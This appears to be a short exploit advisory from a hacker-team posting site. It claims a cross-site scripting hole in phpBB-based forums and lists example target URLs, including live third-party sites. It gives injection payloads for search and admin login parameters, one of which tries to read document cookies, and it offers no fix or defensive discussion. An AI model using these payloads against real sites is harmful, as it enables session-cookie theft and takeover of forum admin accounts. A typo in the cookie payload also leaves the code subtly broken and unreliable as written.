[D] phpBB Forums -- XSS Bug f4r discussion and development [Z]
2010-12-20 14:33:19Inviato da: kedans
# Name : [D] phpBB Forums -- XSS Bug f4r discussion and development [z]
# Date : n/a
# Author : KedAns-Dz < ked-h (at) hotmail (dot) com >
# Team : [D] HaCkerS-StreeT-Team [z]
# special thanks to : BadR0 (+) Nor0 FouinY
# greetz to : XoreR (+) Fox-Dz (+) Dr.Ride (+) Islampard (+) Hani Nin0 (+)
// Zaki.ENG (+) Masinhou-Dz (+) MaTmour13
Allahou AkbaR -- 1 2 3 ViVa l'Algerie
:::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::
Example : http://4nahdha.com/admin/login.forum?
// : http://spnet.getgoo.us/search?mode=
:::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::
Attack parameter: "><script>alert("xss")</script>
// // : "><script>alert(documents.cookie)</script>
>http://[server]/admin/index.forum?part=/admin --> rem :Admin: --> att XSS
>http://[server]/search?mode= ++ XSS++
::::::::::::::::::::::::::::::::::::::(0x3a):::::::::::::::::::::::::::::::::::::::::::
[D] HaCkerS-StreeT-Team [Z]
>> KedAns-Dz (+) BadR0 (+) Dr.Ride (+) XoreR (+) Fox-Dz <<
> Red1One (+) Islampard (+) NoR0 FouinY (+) Hani Nin0 (+) Masinhou-Dz <
:::::::::::::::::::::::::::::: By KedAns DZ :::::::::::::::::::::::::::::::::::::::::::
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.